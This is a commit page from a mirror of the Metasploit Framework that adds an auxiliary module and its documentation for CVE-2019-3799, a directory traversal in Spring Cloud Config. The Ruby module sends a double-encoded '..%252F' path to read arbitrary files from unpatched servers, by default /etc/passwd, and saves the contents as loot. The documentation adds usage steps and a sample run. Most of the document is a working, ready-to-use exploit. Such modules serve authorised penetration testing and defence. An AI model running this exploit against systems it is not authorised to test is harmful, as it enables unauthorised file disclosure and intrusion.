infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #11745, Add spring-cloud-config-server dir traversal

master
Jacob Robles 2019-04-26 09:35:37 -05:00
parent decb88b2ac 306b0fd2e7
commit c282547a0b
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
2 changed files with 106 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
documentation/modules/auxiliary/scanner/http/springcloud_traversal.md Normal file
View File

@ -0,0 +1,35 @@
## Description
This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
Spring Cloud Config listens by default on port 8888.
### Vulnerable Application
* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
## Verification
1. `./msfconsole`
2. `use auxiliary/scanner/http/springcloud_traversal`
3. `set rhosts <rhost>`
4. `run`
## Scenarios
### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
```
msf > use auxiliary/scanner/http/springcloud_traversal
msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
RHOSTS => 192.168.1.132
msf auxiliary(scanner/http/springcloud_traversal) > run
[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/springcloud_traversal) >
```
## References
* https://pivotal.io/security/cve-2019-3799

71
modules/auxiliary/scanner/http/springcloud_traversal.rb Normal file
View File

@ -0,0 +1,71 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Spring Cloud Config Server Directory Traversal',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,
versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring
Cloud Config listens by default on port 8888.
},
'References' =>
[
['CVE', '2019-3799'],
['URL', 'https://pivotal.io/security/cve-2019-3799']
],
'Author' =>
[
'Vern', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'DisclosureDate' => '2019-04-17',
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8888),
OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
])
end
def data
Rex::Text.rand_text_alpha(3..8)
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
uri = "/#{data}/#{data}/master/#{traversal}"
res = send_request_raw({
'method' => 'GET',
'uri' => uri
})
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
vprint_good("#{peer} - #{res.body}")
path = store_loot(
'springcloud.traversal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end